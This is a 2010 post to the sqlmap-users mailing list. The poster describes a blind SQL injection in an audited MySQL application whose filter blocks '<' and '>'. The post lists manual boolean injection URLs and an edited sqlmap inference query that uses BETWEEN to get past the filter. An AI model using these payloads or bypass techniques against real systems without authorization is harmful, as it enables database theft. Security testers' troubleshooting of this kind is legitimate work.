[sqlmap-users] blind sql injection problem
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] blind sql injection problem
|
From: velky b. <vel...@gm...> - 2010-02-20 17:38:26
|
Hello,
I have found blind SQL injection in the GET parameter of audited MySQL
application (also sqlmap is able to identify the injection), but it is not
possible to dump any data (like --current-user or --current-db). Only
option, which is working is --fingerprint (gives correct result of mySQL 5
version), all other options gave the same result as "None".
Because it looked strange to me, I made some basic tests manually with
following results:
http://localhost/index.php?id=9 AND 1 = 1 ---> TRUE (should be TRUE)
http://localhost/index.php?id=9 AND 1 = 0 ---> FALSE (should be FALSE)
http://localhost/index.php?id=9 AND 6 > 5 ---> FALSE (should be TRUE)
http://localhost/index.php?id=9 AND 6 < 5 ---> FALSE (should be FALSE)
http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 5 ---> FALSE
http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 10 ---> TRUE
As you can see from these results, it looks that characters "<" and ">" are
filtered within application.
However, injection is still working. I suppose, that sqlmap uses these
characters ("<",">") really often during dumping of data from database.
So I have changed the following line in mysql section of queries.xml file:
original line:
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
updated line:
<inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>
Unfortunatelly, the result was same (None). What else should be modified?
Is it be possible to use BETWEEN statement instead of ">" in current version
of sqlmap?
Is it already supported somehow in sqlmap or would it appear in future
versions?
Thank you in advance
vb
|
